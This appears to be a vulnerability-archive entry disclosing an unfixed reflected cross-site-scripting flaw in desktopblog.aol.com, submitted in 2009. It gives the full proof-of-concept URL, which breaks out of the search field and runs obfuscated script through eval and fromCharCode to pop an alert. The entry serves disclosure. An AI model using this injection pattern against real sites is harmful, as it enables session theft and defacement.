| 
 
| Security researcher Smokey, has submitted on 26/09/2009 a cross-site-scripting (XSS) vulnerability affecting desktopblog.aol.com, which at the time of submission ranked 35 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 26/09/2009. It is currently unfixed.
 If you believe that this security issue has been corrected, please send us an e-mail.
 |  
              | Date submitted: 26/09/2009 | Date published: 26/09/2009 | Fixed? Mail us! | Status:  UNFIXED |  
| Author: Smokey | Domain: desktopblog.aol.com | Category: XSS | Pagerank: 35 | 
|---|
 
 
| URL: http://desktopblog.aol.com/search/?q=%22%27%3E%3Cscript%3Eeval%28String.fromCharCode%2897%2C108%2C10 1%2C114%2C116%2C40%2C34%2C88%2C83%2C83%2C32%2C102%2C111%2C117%2C110%2C100%2C32%2C98%2C121%2C32%2C83%
 2C109%2C111%2C107%2C101%2C121%2C32%2C79%2C102%2C32%2C68%2C97%2C114%2C107%2C99%2C48%2C100%2C101%2C32%
 2C72%2C97%2C99%2C107%2C99%2C105%2C110%2C103%2C32%2C67%2C114%2C101%2C119%2C34%2C41%2C59%29%29%3C%2Fsc
 ript%3E%3C%21--
 |  
| Click here to view the mirror |  
|  |  |